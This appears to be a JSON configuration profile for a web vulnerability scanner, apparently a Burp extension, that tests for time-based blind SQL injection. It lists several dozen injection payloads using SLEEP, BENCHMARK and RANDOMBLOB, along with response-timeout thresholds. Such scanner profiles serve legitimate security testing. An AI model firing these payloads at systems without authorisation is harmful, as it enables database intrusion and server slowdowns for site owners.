[
  {
    "ProfileName": "BlindSQLi - Generic - TimeBased",
    "Name": "",
    "Enabled": false,
    "Scanner": 1,
    "Author": "@egarme",
    "Payloads": [
      "true,sleep(15)#",
      "true,(sleep 15)--",
      "true,(sleep 15)",
      "true,(sleep(15))--",
      "true,(sleep(15))",
      "true,-sleep(15)",
      "true,SLEEP(15)#",
      "true,SLEEP(15)--",
      "true,SLEEP(15)\u003d\"",
      "true,SLEEP(15)\u003d\u0027",
      "true,\";sleep 15--",
      "true,\";sleep 15",
      "true,\";sleep(15)--",
      "true,\";sleep(15)",
      "true,\";SELECT SLEEP(15); #",
      "true,1 SELECT SLEEP(15); #",
      "true,+ SLEEP(15) + \u0027",
      "true,\u0026\u0026SLEEP(15)",
      "true,\u0026\u0026SLEEP(15)--",
      "true,\u0026\u0026SLEEP(15)#",
      "true,;sleep 15--",
      "true,;sleep 15",
      "true,;sleep(15)--",
      "true,;sleep(15)",
      "true,;SELECT SLEEP(15); #",
      "true,\u0027\u0026\u0026SLEEP(15)\u0026\u0026\u00271",
      "true,\u0027 SELECT SLEEP(15); #",
      "true,benchmark(150000000,MD5(1))",
      "true,benchmark(150000000,MD5(1))--",
      "true,benchmark(150000000,MD5(1))#",
      "true,or benchmark(150000000,MD5(1))",
      "true,or benchmark(150000000,MD5(1))--",
      "true,or benchmark(150000000,MD5(1))#",
      "true,ORDER BY SLEEP(15)",
      "true,ORDER BY SLEEP(15)--",
      "true,ORDER BY SLEEP(15)#",
      "true,AND (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,OR (SELECT 1337 FROM (SELECT(SLEEP(15)))YYYY)-- 1337",
      "true,RANDOMBLOB(1500000000/2)",
      "true,AND 1337\u003dLIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(1500000000/2))))",
      "true,OR 1337\u003dLIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(1500000000/2))))",
      "true,RANDOMBLOB(1000000000/2)",
      "true,AND 1337\u003dLIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(1000000000/2))))",
      "true,OR 1337\u003dLIKE(\u0027ABCDEFG\u0027,UPPER(HEX(RANDOMBLOB(1000000000/2))))"
    ],
    "Encoder": [
      "URL-encode key characters"
    ],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [],
    "Tags": [
      "SQLi",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "14",
    "TimeOut2": "20",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 5,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "BlindSQLi - Generic - TimeBased",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      18,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127,
      65,
      32,
      36,
      7,
      1,
      2,
      6,
      33,
      5,
      35,
      34,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]